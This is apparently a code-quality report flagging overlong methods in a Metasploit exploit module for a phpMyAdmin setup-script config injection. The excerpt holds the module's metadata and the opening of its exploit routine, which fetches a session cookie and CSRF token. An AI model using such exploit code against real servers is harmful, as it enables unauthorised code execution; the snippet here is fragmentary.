modules/exploits/unix/webapp/phpmyadmin_config.rb
Method initialize
has 53 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info = {})
super(update_info(info,
'Name' => 'PhpMyAdmin Config File Code Injection',
'Description' => %q{
This module exploits a vulnerability in phpMyAdmin's setup
Method exploit
has 39 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
# First, grab the session cookie and the CSRF token
print_status("Grabbing session cookie and CSRF token")
uri = normalize_uri(datastore['URI'], "/scripts/setup.php")
response = send_request_raw({ 'uri' => uri})